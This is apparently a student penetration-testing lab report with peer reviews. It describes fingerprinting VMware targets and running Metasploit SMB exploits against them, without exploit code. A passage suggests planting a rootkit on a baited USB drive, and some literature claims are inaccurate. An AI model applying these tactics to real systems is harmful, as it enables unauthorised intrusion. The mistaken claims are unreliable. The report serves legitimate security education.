Abstract
Making use of automated exploit tools to attack a system is not a new topic. It is an idea and practice that is well founded in “hacker” and “script kiddy” culture. It is however a somewhat newer practice in the arena of the penetration tester. Using an automated attack tool can make the job of a security professional much easier, but it is just one part of the successful penetration analysis. This one part is never the less a very important part.
In this lab we will be using both passive and active analysis and recon tools. These tools combined with automated exploit tools will help us to exploit test target systems. These systems will be running in a penetration test lab on VMware. We will exploit three target systems of varying operation systems and patch level. Making use of the exploit tools explained in the lab we will attempt to gain access to each system in varying ways while recording and discussing our results.
Literature Review
A Taxonomy of DDoS Attack and DDoS Defense Mechanisms by Jelena Mirkovic and Peter Reiher
Distributed denial of service attacks is becoming a big problem and be become difficult for an organization to defend itself. In this article Mikrovic and Reiher present two “presents two taxonomies for classifying attacks and defenses” (Mirkovic, J., & Reiher, P. 2004). They also cover how DDoS attacks are performed. They do a general overview on this section with some specification. Attackers recruit machines that have vulnerabilities and exploit them using subversion.
Subversion is an open source tools that has several features not just for exploiting machines. Attackers usually automate the process of scanning for hosts and exploiting them to become part of there attack network also sometimes referred to as bot network. After a host has been infected, that host can also attempt to recruit more hosts.
Another way of gathering host is by using a Trojan within a useful program for users.
There are several DDoS attack mechanisms which in this paper have been broken up into manual, semi-automatic and automatic. An example of semi-automatic and automatic is Vertical Scanning. The scan looks for “machines probe multiple ports at a single destination, looking for any way to break in” (Mirkovic, J., & Reiher, P. 2004).
The impact of the victim may be disruptive or degrading attacks depending on the impact of the DDoS attack. If the goal is disruptive the attack will deny users access to service or services that are being provided. Degrading attacks have the goal to consume some “portion of a victim’s resources, seriously degrading service to legitimate customers” (Mirkovic, J., & Reiher, P. 2004).
Dynamic recovery is divided into, self-recoverable, human-recoverable, and non-recoverable. Self-recoverable is exactly as it sounds, the system recovers without the aid of human interaction. Human-recoverable is when a system is an need of human intervention such a reboot. Non-recoverable is when the attack has made permanent damage to the target system.
DDoS defenses are differentiated between preventive and reactive mechanisms. Preventive mechanisms has a goal to “to eliminate the possibility of DDoS attacks altogether or to enable potential victims to endure the attack without denying services to legitimate clients” (Mirkovic, J., & Reiher, P. 2004). Placing a decoy for attacks to attack without actually preventing users to being able to access there resources is a great trick. Reactive has the goal to detect every possible DDoS attack as early as possible. This is true to every attack, defending yourself is, knowing that you are being attacked at the earliest stage possible. Knowing too late and the attack could be over. This must also have a low degree of false positives and provide a response mechanism.
Attack Net Penetration Testing by J.P. McDermott
McDermott talks about how penetration testing is more of an art then science, and how testers need to have knowledge of products and systems. This article is about usefulness of penetration testing as a Petri net. This technique has the depicting refinement of specific attacks and attack alternatives which is similar to attack trees. He then draws out an attack tree for opening a safe. Open Safe is at the top, then four ways of opening the safe are listed below from there the tree counties to grow blackmail, eavesdrop and so forth in order to open the safe. Looking at every possible way to access what is desired is important for an attack tree. He also talks about six flaw hypothesis approach, ”
1. Define penetration testing goals.
2. Perform background study.
3. Generate hypothetical flaws.
4. Confirm hypothesis.
5 Generalize discovered flaws
6. Eliminate discovered flaws. (McDermott, J.)”
McDermott then goes on to give an example using Mitnick attack, which using SYN flooding, TCP session hijacking, and UNIX .rhosts trust relationship spoofing, to represent the exploit.
McDermott attack net approach to penetration testing is a good approach to follow. He may not provide any supporting data but does have several diagrams that show an adherent to the brainstorming activity while at the same time not restricting the free range of ideas.
Ethical Hacking and Pasword Crackign: A Pattern For Individualized Security Exercises by Robin Snyder
This paper is for teaching students about ethical hacking by showing password cracking. Cracking password can show which user have picked weak passwords. This can be done during a penetration test. Hashing is often done to store password information. There are a few different kinds of hashes, MD4, MD5, and SHA1 are popular hashes. Some password crackers guess until the password hash is a match, such as John the Ripper. The article then lays out an exercise that is given to students on how to use software, such as John the Ripper, to login using different login names on a simulated login box via web. The article gives two viewpoints, from the student and from the teacher. According to the feedback section the students were able to complete this assignments found the exercise useful and were beneficial for them. These kind of exercise that are hands on for students are very beneficial, simply writing about how exploits are done is only one side of the teaching spectrum. Learning different ways to exploit usernames can show students how unsecured logins can be and how easily possible it is to exploit them.
Root Kits – An Operating System Viewpoint – by Winfried E. Kühnhasuser
Roots kits are dangerous to operating systems, they get down towards the lower layers of the operating system to execute operations as super user or system privileges. According to Kühnhasuser a root kit attack is made up four automated steps. The steps are vulnerability analysis, vulnerability exploitation, erase all traces of the attack, and lately install backdoors. In step one the author says that “randomized scan of standard IP ports is preformed by ways of harmless appearing requests” (Kuhnhauser, W. E.) this might be true but this could be picked by an IDS system monitoring the network noticing requests across the subnet. The first step is crucial to using root kits. Another way would be put the root kit on an USB flash drive. Leave the USB flash drive where the target user would be around to take and hopefully use at the target system. Another method may be to label the USB flash drive as BEST PORN EVER. From there two things could happen, the target victim would throw it away (not use it) or open it and tell others of this discovery. From there the rest step one can be executed, discovering ways to exploit the host system. When attempting to remotely install a rootkit, there are several factors that were not mentioned. How would one get to the network? Is the attacker going to be on the subnet? What about firewalls, IDS, Anti-Virus software? Using USB can avoid most of these variables. In this defense strategies does Kühnhasuser mention Firewalls and also says the “firewall are useless to counter insider attacks” (Kuhnhauser, W. E.) which is what the USB root kit would be doing.
Modeling TCP/IP Networks topology for Network Vulnerability Analysis by Reza Zakeri, Hamid Reza Shahriari, Rasool Jalili, Reza Sadoddin
In this article, the authors talk about how security is a great concern and how there is no formal framework for protecting against attacks. There exist several ad hoc techniques used to protect networks. The authors use a man in the middle attack to demonstrate how to use the proposed model to show network security analysis. The authors broke down the way the man and the middle attack works. They then used derivative rules to verify that the network was vulnerable to man in the middle attacks.
Firewall Penetration Testing by Reto E. Haeni
This article talks about firewall penetration testing, and how it should be executed. Haeni says that the testers should not be firewall vendors or hackers because they are not a solution. That an independent group that is trusted with integrity, experience, writing skill and technical capabilities should lead the testing. If this is the case, a non-hacker is in charge of attempted to break into a firewall, this is like asking a non-mechanic to fix your car. This group does need to have integrity as well as experience in how an attacker would penetrate the defensives. Haeni also mentions how often firewalls are the “only line of defense needed to secure our information systems” (Haeni, R. E., 1997). The only line of defense needed is a firewall, is not a good security practice. Firewalls should be used in conjunction with other secure systems. Haeni also states that firewalls will have weaknesses if not installed properly. Environments are different and not all firewall can be configured the same. Simply saying that it was not properly installed can apply to anything to recover from a loss.
According to Haeni testing a firewall should be divided into four steps, indirect information collection, direct information collection, attack from the outside and attack from the inside. Listed are only two types of firewalls Packet filtering and Application level firewalls. Something to consider is when these firewalls are filtering, what kind of performance hit is the network taking? During high network usage times there can be a bottle neck where the firewall box is inspecting every packet and can cause collations. Haeni solution is to wait until computing power has doubled, usually 12 months according to Haeni, and buy a new firewall box. He believes this is not a great concern. Small companies many be forced to watch there spending budget and must reframe from extravagant purchasing. Buying top of the line firewalls every 12 months can be a waste of spending. If possible to spend that kind of money every 12 months, one would have to wait until the manufacture is done building them. Is getting the newest hardware always the greatest?
A Distributed Network Secuiryt Assessment Tool with Vulnerability Scan and Penetraton test by Shih-Jen Chen, Chung-Huang Yang, and Shao-Wei Lan
Securing systems can be a complex and challenging demand. Security fixes are costly and while no one can really put a number to it, however the cost is high. The authors created a user-friendly tool that automates network vulnerability assessments. This tool is developed for Windows and is mainly in Java. The authors claim it also generates credible reports for network mapping, vulnerability scan, and penetration test. They test there software and show results with screen shots. The vulnerability scan lets the user select predefined profiles or plug-ins. Microsoft Windows-related vulnerabilities, SANS top 20 vulnerabilities, UNIX-related vulnerabilities are just some of the predefined profiles. This somewhat answers the question does the tool only scans for vulnerabilities for one operating systems. This software seems to closely resemble another program called NESSUS. They both seem to offer the same features, additional plug-ins, vulnerabilities scanning, detailed report and more.
Mobile Test: A Tool Supporting Automatic Black Box Test for Software on Smart Mobile Devices by Jiang Bo, Long Xiang, and Gao Xiaopeng.
In this article, they talk about how smart mobile devices are becoming more powerful and the authors are introducing a tool called MobileTest. This tool is a black box testing software for mobile devices. Phone manufacturers and third-party software vendors need to guarantee that there product is high quality, users do not like when there phone looses personal data or crashes frequently which would be like a denial of service attack on the customer. Mobile Test has a few objectives:
“Good support for interactive operations test, volume
test, multiple states test, boundary test and multiple
task tests.
Minimize the usage of image comparison and text
recognition for state determination.
Create test cases library and provide schedule
mechanism for regression test and smoke test.
Accommodate for as many devices as possible and
provide adapters for future devices to be added.
Provide flexible storage support for test cases,
configuration data and results.
Strong result verification abilities. Such as image
comparison, OCR, audio and video data verification.
Provide mechanisms to control the environment of the
target device so that it’s possible to test the device’s
behavior in different environments.
Support script generation and execution visualization” (Zakeri, R., Shahriari, H., Jalili, R., & Sadoddin, R., 2005)
The research on phone seems to have been done only on Nokia with slightly different models. They used Nokia 6630, Nokia 6680, and Nokia 6681. All the phones operating system was based on Symbian platform. This test only shows possible issues with Symbain platform phones. There are other phone platforms available such as Windows Mobile, and Apples IPhone OS. It seems as MobleTest is limited to only a certain brand of cell phone manufactures.
Methods
This lab begins with the literature review listed above. The literature chosen for this weeks lab relates to the steps that will be completed as the actual lab assignment. With the completion of the literature review the purpose of lab six is to exploit three different systems using a variety of tools and methods, and discuss the results. This task can be broken down into five main sections, as the method of exploit on each of the three systems is slightly different. The first step involves putting together a plan of attack based on passive recon methods to exploit the first system, while recording the results. We will accomplish this my simulating network traffic of varying types between two hosts, one of which will be the target host, while a third host captures that traffic passively. We will then analyze the captured data using a tool that performs OS fingerprinting based on captured packets. Based on the analysis of packets, exploits will be chosen and executed based on previous lab results. Records will be made as to how many exploits we needed to try before success or failure. We will be performing these steps on virtual machines running inside VMware workstation, expecting results immediately upon completion. We are hoping to achieve an exploit within the first few tries. The second step is much like the first, but requires the results of the first step to complete. Using the results of the first step, a plan of attack will be performed to compromise the second chosen system. Again, the first part being to generate network traffic between two hosts, one of them being the target, while a third host captures that traffic passively. Once those captured packets have nee analyzed with the OS fingerprinting tool, we will choose and execute exploits against the second target system. We will be recording our results until success or failure is met. We will be performing step two on virtual machines running on VMware workstation, again expecting results upon completion of the tasks. For this step we hope to be able to successfully exploit the target system. For the third step, a different target will be selected. Rather than perform passive analysis on this system, we will actively scan an analyze it. Using NESSUS and the latest version of NMAP we will obtain results that can be used to directly attack the system. Exploits will be chosen based on the version of operating system and open ports as discovered by NMAP, as well as vulnerability data reported by NESSUS. We will then attempt to exploit the chosen system, while recording our results. Again this will be done using virtual machines running in VMware workstation, expecting results upon completion. Our goal being to successfully exploit the system based on the reports of the tools employed. The Four and final step in the lab is discussion of the results. This will be based on the results themselves, how the tools used display bias towards various OSI layers, and whether or not lower OSI layer exploits allow the attack access to the higher layers of the OSI model. This will be performed with the use of any tool other than a word processing program and our previous results. Our goal being to explain in depth our results as they pertain to real world uses.
Findings
To complete the lab three target operation systems had to first be selected. Our lab environment consists of five virtual machines. Two Windows XP virtual machines, one being the original RTM version, the second being a fully patched service pack three version. One Windows Server 2003 service pack two virtual machine, and one minimal install Debian Etch virtual machine. The fifth virtual machine is a pre-built backtrack version three virtual machine. While this is one of the five labs virtual machines it will not be a target host as it is our primary platform for penetration testing operations. The three chosen machines were the Windows XP RTM VM, Windows XP SP3 VM, and Windows Server 2003 VM. We also attempted to exploit the Debian machine, but due to the lack of any running daemons, this proved to be futile. For step one, we used the Windows XP RTM VM as the target. We chose to use tcpdump and p0f as the passive analysis tools as the work together and are part of the backtrack tool suite. We ran the following command from the backtrack cli:
Tcpdump -i eth0 -w tcpdump1
This tells tcpdump to capture packets on the ethernet0 interface and save them to the output file tcpdump1 instead of displaying them on the screen. The ethernet0 interface on the backtrack VM was connected to the same vSwitch as the target host. We then logged into the target VM and started to create network traffic. We chose to ping, telnet, and connect to an SMB share on the host that would be the step two target. We stopped tcpdump on the backtrack vm with ctrl+c and loaded the chosen fingerprinting tool, p0f, and told it to analyze the packet capture ‘tcpdump1.’ The results are detailed in figure one in the tables and figures section. According to p0f the collected packets were from a Windows 2000 SP4 machine, and or a Windows XP SP1+ machine. With this information in hand we loaded the metasploit framework version 3 GUI from the backtrack menu on the backtrack VM and chose an SMB exploit detailed in figure two below. We knew that because it was a Windows XP host that the services related to server message block were available as Windows relies on ports 137, 139, and 445 being available for proper network operation. We pointed the chosen exploit at the IP address (192.168.2.3) of the target host and ran it. Success was achieved on the first attempt and is detailed in figure three.
For step two, the same process was completed as above. We ran the following command from the backtrack cli:
Tcpdump -i eth0 -w tcpdump2
Again, ethernet0 on the backtrack VM was connected to the same vSwitch as the target host and tcpdump2 was the name of output file to store the captured packets instead of displaying them on screen. In this case, the target host operation system was the Windows XP service pack three VM. We then logged on to the part one target machine, and pinged, attempted telnet, and SMB share access on the current target VM. This generated enough packet data for p0f to state, as before that the target machine was indeed a Windows XP SP1+ machine, which is detailed in figure four. With this information in hand an exploit was chosen based on our previous lab work, and the metasploit framework. We again settled on an SMB vulnerability as these are most prevalent and, even with the windows firewall running, must be accessible to other hosts to allow proper windows network operation. We attempted the same exploit we used in figure two below, and it proved unsuccessful. We then attempted to exploit MS08-067, a very recent critical SMB vulnerability effecting all versions of Windows. We again met with failure. Then MS08-011 LSASS vulnerability was attempted also proving useless. We also considered MS09-001As we searched through the list of available metasploit vulnerabilities, most of the possible tool based attack vectors are both very old and outdated, or for third party applications, none of which were running on our target host. After examining the list of available exploits in metasploit as well as the other programs on the backtrack VM it was obvious that a fully patched Windows XP service pack three machine was not exploitable without running any third party programs. After spending a number of hours trying to exploit the Windows XP SP 3 machine through researching available vulnerabilities on the Microsoft website and comparing them to available exploits in metasploit we decided to move on. The currently available vulnerabilities did not match up to any available exploits in backtrack. Before failure we had tried 20 different exploits.
For the third system we first attempted to exploit the Debian machine. It had no running daemons according to the NESSUS and NMAP scans, aka no open ports for possible network exploit. Rather than just move on to the Windows Server 2003 machine, we used apt-get to install openssh, openssl, samba, and apache. We then attempted to exploit these using Metasploit. However the versions of these programs installed were patched against the exploits in metasploit.
After the Debian machine we moved on to the Windows Server 2003 machine. We ran NMAP and NESSUS scans against it as detailed in figures five and six. We downloaded the latest version of NESSUS plug-ins, and the latest version of NMAP, NMAP 5. NMAP 5 was released last week, and offers a few major improvements over the last version which are detailed on the NMAP website. Figure seven details the few vulnerabilities that NESSUS found, but they do line up with the open ports that NMAP found. We attempted to take advantage of the SMB based vulnerabilities found using NESSUS, namely the vulnerabilities on port 445. However using Metasploit we found this vulnerability to be useless, as the machine had been patched against it. Again spending a number of hours researching vulnerabilities against a patched version of Windows Server 2003 and comparing them to metasploit, which is the core pen testing app in backtrack, we determined it as not possible. Like Windows XP SP 3, without running third party vulnerable programs, it would be next to impossible to exploit a Windows Server 2003 machine using automated exploit tools. After attempting the same exploits we attempted on the Windows XP SP3 machine, including MS08-011, and MS08-067, and MS09-001, and about 15 others, we gave up. The determination being that with a good patch policy, automated exploit tools are not very effective if they do not keep up with current vulnerabilities.
Using the results of this lab as well as previous labs, bias in tool selection and use comes into play. The first bias seems to exist in the OSI layer. Most vulnerabilities exploit problems that exist in the higher layers of the OSI model, layers 5 through 7 to be specific. The lower layers generally do not seem to be exploited as much as apparent in the automated tools that perform vulnerability exploiting. This does not mean that lower layer software like network drivers for example are not vulnerable, it only means that exploit developers do not focus on the lower layers. From our stand point this seems like an error in reasoning as exploiting a lower layer, like layer two, would give the exploiter access to the higher layers. By intercepting and changing the information given to the higher layers of the OSI models an attacker could craft any and deliver any information they chose to an application running on target system. Another bias that becomes apparent is in vulnerability analysis. By making use of NESSUS we saw that it was much more likely to show possible vulnerability information for Windows machines than *NIX style machines. This is also shown in metasploit, which has a larger number of exploits in its database for windows machines than *NIX machines. The final bias, which seems to be related to those listed above is that NESSUS isn’t always the most accurate in garnering accurate information. The information in its database of plug-ins suggests that it would be the tool to discover how to exploit a system. This is not always the case. Based on our lab results, using NESSUS as an exploit tool, we were able to exploit a system faster not using it then actually using it. The Windows XP RTM machine was exploited on the first attempt using nothing more then passive tools and some know how, while we were not able to exploit the Windows Server 2003 Machine using the results of the NESSUS and NMAP scans. The bias of NESSUS itself seems to be in that it doesn’t actually check to see if the vulnerabilities it lists are actually exploitable.
Issues
There were three major issues with this lab. First, we were not able to exploit the Windows XP SP3 machine using passive tools. Second, we were not able to exploit the Windows Server 2003 Machine or Debian machine using active scanning tools. Third, Metasploit’s website was down most of the weekend preventing us from downloading the most recent updates to metasploit until Sunday.
Conclusions
Using tools to exploit possible target systems is a very simple task. There are a number of automated tools available in the wild that aid would-be attackers into gaining unauthorized access to victim computer systems. However this lab has shown that tools alone are not always the answer. Without the knowhow of an actual security professional, exploit tools are nothing more then a guess and check, finger crossing exercise. But in the hands of the right person with the right knowledge, automated attack tools are a very dangerous weapon in the penetration testers arsenal.
Tables and Figures
Figure 1
Figure 2
Figure 3
Figure 4
Figure 5
Figure 6
Works Cited
Bo, J., Xiang, L., & Xiaopeng, G. (2007). MobileTest: A Tool Supporting Automatic Black Box Test for Software on Smart Mobile Devices. Second International Workshop on Automation of Software Test , 1-8.
Chen, S.-J., Yang, C.-H., & Lan, S.-W. (2007). A Distributed Network Security Assessment Tool with Vulnerability Scan and Penetration Test. The 2007 Symposium on Cryptography and Information Security (pp. 1-4). Sasebo: The Institute of Electronics Information and Communication Engineers.
Haeni, R. E. (1997). Firewall Penetration Testing. Washington, DC: The George Washington University.
Kuhnhauser, W. E. (2004). Root Kits – An Operationg Systems Viewpoint -. ACM SIGOPS Operating Systems Review , 12-23.
McDermott, J. (2001). Attack Net Penetration Testing. Proceedings of the 2000 workshop on New security paradigms (pp. 15-21). Ballycotton: ACM.
Mirkovic, J., & Reiher, P. (2004). A taxonomy of DDoS Attack and DDoS Defense Mechanisms. ACM SIGCOMM Computer Communicatons Review , 39-54.
Snyder, R. (2006). Ethical Hacking And Password Cracking: A Pattern For Individualized Security Exercises. InfoSecCD Conference ’06 (pp. 13-18). Kennesaw: ACM.
Zakeri, R., Shahriari, H., Jalili, R., & Sadoddin, R. (2005). Modeling TCP/IP Networks Topology for Network Vulnerability Analysis. In V. Kumar, J. Srivastava, & A. Lazarevic, Managing Cyber Threats (pp. 247-266). Springer US.
This group’s abstract was well written. The abstract first starts off explaining the concept of using automated tools to attack a system and how automated tools make penetration testing much easier. They also explain that through proper planning can a really successful penetration be accomplished. The last part of the abstract explains what will be involved in this lab. This lab’s literature review could have done better. The review of each of the articles was a summary of the article and not much else. Some of the reviews did give a comment or two about the information in the article, but did not actually review the article. The reviews lacked any information on how each of the articles relate to each other or how they relate to the current lab. The reviews also lacked a discussion of the methodology or research of the article. The group did do a commentary style discussion of some of the articles, but did not put much into giving their opinion. Some of the reviews were extremely too short and just gave a quick summery of the whole article. This group could have done a lot better job on the literature review section of this lab. The methodology the group put together for this lab seemed to be just a rehash of the steps for this lab given in the lab rules. The group explained each step of the lab, but did not give any details on how they were going to accomplish that part of the lab. One of the requirements of the lab was to choose three systems to perform penetration tests on and the group did not even give the operating systems that they were going to perform their penetration tests on. The group also did not give any tools that they were going to use and how they were going to configure or use those tools. The group did do a good job in keeping any results out of the methodology, but did not set up the lab in the same processes. Examining this shows me that a lot of stuff that should have been in the methodology is going to be in the findings part of this lab. In the beginning of the findings section the group starts off giving their setup of their penetration test lab. As mentioned earlier this should have been part of the methodology section of this paper. The group is using a Backtrack system as the attack platform and the three Windows platforms as the targets. The group also tried to penetrate a Debian system, but because there were no services running on that system they gave up the attempt. The group then goes on explaining the tools and how they set up the commands to use each of the tools. Again this should have been in the methodology section. The group then does a nice job in explaining all the steps in how they ran the penetration test on the first operating system, Window XP SP3, and how they were successful in gathering information and using that information to run an exploit on the system to gain access to that system. The group then goes into explaining the second system that they tried to exploit, which was the Windows XP SP3 system. Using the same attack plan as the previous penetration test the group gains information on the type of operating system used on that system. They then try a number of exploits against the system and fail to penetrate the system. They do a very good explanation of the types of exploits the used and they also give a brief explanation of what might work, but do not try it out. They briefly explain the penetration test they did on the Debian system. They even loaded some services onto the operating system and tried to exploit it, but failed. Next the group explains the penetration test against the Windows Server 2003 machine. In this one the group uses the newest plug-ins and versions of Nessus and Nmap to actively scan the operating system. This gave them a list of vulnerabilities to use against the machine, but when attempts at exploiting the vulnerabilities were done the penetration test failed. The group again explained this step very well and gives details on the exploits they used and how many attempts they tried. The last part of the finding section gives a discussion of what was discovered when doing all these labs. The section explains nicely how by attacking lower layers, one could control higher layer devices and applications. They also explain the bias toward Windows operating systems in exploits are more prominent than exploits in UNIX or LINUX systems. Last the group explains that using Nessus and Nmap will not always work better than a manual scan of a system and then picking exploits to test the vulnerabilities. The group points out that even though Nessus or Nmap show the vulnerabilities, they do not test if exploits will work against them. The issues that the group had were that they could not exploit the Windows XP SP3 system, Windows Server 2003 system, and the Debian system. I do not think that this was necessarily an issue, but that it showed that some systems are a lot harder to penetrate. The other issue that the group had was that the Metasploit website was down and the group could not get the newest updates until Sunday. The group’s conclusion does a great job in summing up what they learned in this lab. They explain that automated tools do not work that well unless they are in the hands of a professional. At the end of the paper the group gives screenshots of each of the attempts at ether gaining information from the operating systems or exploiting the vulnerabilities to gain access.
While I don’t make a point of criticizing abstracts too often, I disagree with the statement in the abstract that automated tools are a new practice in the area of penetration testing. I think the previous labs have shown us that they’re used all too much and can actually create vulnerabilities instead of finding them. The literature review is another example of the kind of literature review we’ve been told lab after lab this semester not to do. Each article is handled individually with no ties to the lab exercises. In addition to this, the titles of the papers aren’t formatted any differently from the rest of the text which makes it hard to distinguish between them. In the first paper, subversion is mentioned as an “open source tools that has several features not just for exploiting machines.” I only find 2 mentions of the word “subversion” in the paper by Mirkovic and neither of them are mentioning a tool for exploiting machines. The citations in the review don’t have any page numbers with them so it makes it difficult for the reader to cross reference back to the source material. The summary of Kühnhasuser’s paper was extremely poor. The citation of the paper was completely wrong, there are subject/verb disagreements, and grammatical errors.
The methodologies section details the major points and objectives that the team will accomplish in the lab but lacks detail. The detailed commands and processes for the lab are found more in the findings section. The team mentions that they captured traffic from the virtual machines but didn’t mention how it was captured in the virtual switch environment. Is the broadcast traffic enough to identify the hosts? The details of the actual exploit are too brief. What exploit was used? What tool was used? What did do with the target machine once it had been compromised? The account of the attack against the service pack three virtual machine was more detailed and showed some good ideas for assessing the target host. Since mention was made that twenty different exploits were tried before the team gave up, it would have been interesting to find out what exactly those were. The third system also proved difficult for the team, I liked the fact that they attempted to install additional software on the minimal Debian install to make it more of a functional server and increase the attack surface a bit. Again, the group mentions trying 15 different tools though no other detail is given besides this number.
The findings regarding the bias of the tools has some issues. The statement regarding Nessus showing more vulnerability for Windows machines over *nix machines doesn’t have any backing behind it. I believe there are actually more vulnerabilities for *nix operating systems and applications in Nessus than there are for Windows. The same criticism is given to Metasploit though a quick glance shows quite a few vulnerability exploits for *nix operating systems and applications.
At first the team states that the using automated exploit tools is not a new topic, but then two sentences later the team states that it is a newer topic for penetration . The English in the abstract, as well as the rest of the lab report, is poor. “In this lab we will be using both passive and active analysis and recon tools” is just an example of the poor English. I do not think that the abstract is very clear on what the lab is going to be about. The wording makes it very difficult to follow and understand what the team is trying to convey to the audience. The literature review is a LIST. Teams should know by now not to make the literature review a list, by comments from previous lab reports on this team, as well as on other teams. Where are the page numbers for the citations? The audience will not be able to pinpoint where the quotes come from without the page numbers, unless they read the sources as well. The audience should be able to go to the page number of the reference and see the quote in context.
The team did not answer many of the questions that are required in the literature review. Some of the reviews of the articles were summaries of them without any citations. BEST PORN EVER. Is there really much more I can say about how much that stuck out in the lab report? Some of the articles did not get as much attention as the rest. Was this because there was not as much information in the article, or the team did not feel that it deserved the same scrutiny as the others? The “Mobile Test” article was formatted oddly. The paragraph was broken up. Before submission the team should preview their post to ensure that all the formatting is correct and nothing like this happens in a lab report. How does the literature for this lab relate to the lab assignment? The team does not mention this in the literature review at all. The methods section is just one big paragraph. Separation can make the paragraph easier to read. It was nice that the team started to separate the steps in the findings, but there was more steps in the methods section that what was listed in the findings section. I am not sure that the inability to exploit the machines is really an issue. Failure is always an option. Remember that. If the lab had been started before the weekend, Metasploit’s website might not have been down. Never expect that all sites will be up, especially at Purdue over the weekend. The first sentence of the conclusion states that using tools to exploit systems is a simple task, and yet this team was not able to exploit their own systems.
Team 2’s abstract does not provide clear direction as to what the lab is going to be about. The grammar makes it very difficult to follow and understand what they are trying to say. They do a good job of explaining the use of automated tools for hacking but go on to say that using automated tools in penetration testing is fairly new. This is not what I found to be true in the previous weeks articles.
The literature review is a summary and list of each of the articles and does not tie back to the lab exercises. Some of the reviews of the articles were summaries and did not have proper citations.
The titles of the papers were not properly formatted which made it difficult to distinguish between them. As with team 2’s last literature review there were citation errors and grammatical errors. The team did not answer many of the questions that are required in the literature review.
The methods section is just one big paragraph. This made it difficult to follow. They did however separate the steps in the findings, but there were more steps in the methods section than were listed in the findings section.
Team 2’s conclusion does a good job of summing up what they learned in this lab. They explain that automated tools do not work that well unless they are in the hands of a professional. The screenshots of each of the attempts at the end of the paper of the information from the operating systems or exploiting the vulnerabilities to gain access was helpful to see.
Team 2 begins with the abstract and briefly discusses hacker, script kiddies, and a newer area of penetration tester. This was a good observation for newly growing area of security. They then go into a brief description of what is going to occur during the lab. Next the team goes into their literature review and gives a brief over view of what the literature was about. They do a good job of relating and creating arguments for each of the pieces of literature but it is still not a cohesive literature review in the fact that it discuss more of the topics then how the articles where discussed. The group then goes into the methodology section and describes what they are going to do within the hands on section of the lab. They described some of the tools they where going to use but which operating systems they where going to use did not appear in this section. Next section they went onto the results sections. The team does a good job in describing in detail what the findings for the different exploits. It also becomes aware in this section what systems they are trying to exploit. The operating systems they chose were Windows Server 2003, Windows Xp SP1, and Debian linux. They broke down into sections describing the exploits against each system. Where the section might have yielded better results is to create a plan before attacking the system passively or aggressively. If this was done the attacks may have been more successful. The attacks against Debian Linux were plausible though in there findings because of the small attack surface. The team then discussed the issue of not being able to gain the most recent update of metasploit till Sunday to run more testing against the system. The team then concludes with a simple conclusion of using tools to exploit systems. I would have to agree the point that if a user does not know how to use a tool properly it pretty much becomes a paper weight. But if they know how to use the tool it could cause problems in the wrong user’s hands. A question did come to mind that if the students where given more time. Would it be more likely that each team would have a great overall success when attacking the systems? What other factors might have changed the results of the lab? Also are the teams still getting over that barrier to think of just protecting a system rather than attacking? I feel that even though there is the understanding of how tools and exploits are suppose to work there is still that hump that we might never reach unless become hackers ourselves. Overall the team did a good job with the lab. There where a few areas that may have needed more explanation but the lab still meet the requirements of what was asked.
In the abstract section, team 2 discusses the use of automated tools in conducting penetration tests, and states that the use of tools is just one part of a successful penetration test. They state their purpose for the lab is to use active and passive reconnaissance tools, along with automated exploit tools to gain access to three different target systems.
They begin their literature review by discussing A Taxonomy of DDoS Attack and DDoS Defense Mechanisms. They proceeded to describe several of the terminologies included within the document, however never really explain what a distributed denial of service attack is. They also discussed Root Kits – An Operating System Viewpoint. They provided a short description of a root kit, only stating that it can execute operations at the super user or system level. They discuss several options for distributing a root kit, such as attempting to install it over a network or tricking someone into using an infected thumb drive. Perhaps the best way to distribute a root kit is as a Trojan inside an otherwise innocent looking program. In their review of Firewall Penetration Testing, team 2 makes a good point by saying “Firewalls should be used in conjunction with other secure systems.” Team 2 discusses firewall packet filtering and the performance concerns due to the overhead involved in inspecting each packet. The author of this article himself states “I personally think that this is not too great concern as computing power is doubled roughly every 12 months and therefore solves the problem in time”. Since this article was written in 1997, by this estimate computing power would have doubled 11 times. That would be 2048 times the computing power available back then (2^11). Perhaps the overhead of packet filtering is not as much of a concern now as it was then. They also discuss A Distributed Network Security Assessment Tool with Vulnerability Scan. They compare this vulnerability assessment tool to Nessus. Although there are some similarities between the tools, this article describes a controller-agent system in which the agents are placed throughout the network to perform testing and send reports back to the controller. This team spelled security in the title of this document as “Secuiryt”. Although a typographical error, it should have been discovered by running a simple spell check. Apparently team 2 did not do this before submitting this lab assignment. That may account for some of the other spelling errors scattered throughout the document.
They begin their methodology section by stating that “the literature chosen for this week’s lab relates to the steps that will be completed as the actual lab assignment”. This seems to be the only place that team 2 attempts to make any correlation between the literature review and lab assignment.
They continue their methodology section by restating their object for lab 6 “to exploit three different systems using a variety of tools and methods, and discuss the results”. They began passive reconnaissance by simulating network traffic from the target VM so that they could passively gather packets to be analyzed by an OS fingerprinting tool. They used that information to determine what exploits to execute against the target system. On their third system they used Nessus and Nmap to provide system and vulnerability information. The result of their methodology was that the only vulnerable system was the Windows XP SP0 VM.
Group two’s abstract tied automated attack tools that are normally used by hackers and script kiddies to the realm of penetration testing. The abstract also gave a brief overview of what was to be accomplished in the lab six laboratory assignment.
In the literature review section of the laboratory report, group two needed to italicize the titles of the articles that were analyzed and summarized. Group two needed to tie the denial of service (DoS) article to the topic of penetration testing or to the laboratory assignment. However, the team did state “Attackers recruit machines that have vulnerabilities and exploit them using subversion.” While describing the article about password cracking, the group stated “Some password crackers guess until the password hash is a match, such as John the Ripper.” However, I have to somewhat disagree with this statement from my experience working with these cracking tools, for these tools are only as good as the password lists that are used by these tools. If the password is not in the password list, then the tool would not break the password. How does the article, Modeling TCP/IP Networks topology for Network Vulnerability Analysis relate to penetration testing? The group seemed to provide a very brief summary of this article. In relation to the article about penetration testing with firewalls, I had to agree with the group’s statement “If this is the case, a non-hacker is in charge of attempted to break into a firewall, this is like asking a non-mechanic to fix your car. This group does need to have integrity as well as experience in how an attacker would penetrate the defensives.”I do not think that the author of the article realized that hacking could be done ethically. The group did a good job finding other peculiar statements that were made by the author of the firewall article. When analyzing the article, Mobile Test: A Tool Supporting Automatic Black Box Test for Software on Smart Mobile Devices the group needed to relate the topic of the article, mobile phone application penetration testing to the laboratory assignment.
Group two’s methodology section was quite thorough and broke the team’s plan for executing this assignment into five steps. Team two’s approach to this lab was different from that of the other teams, for team two sent traffic between different virtual machines to simulate more of a realistic network environment and used this traffic to find vulnerabilities.
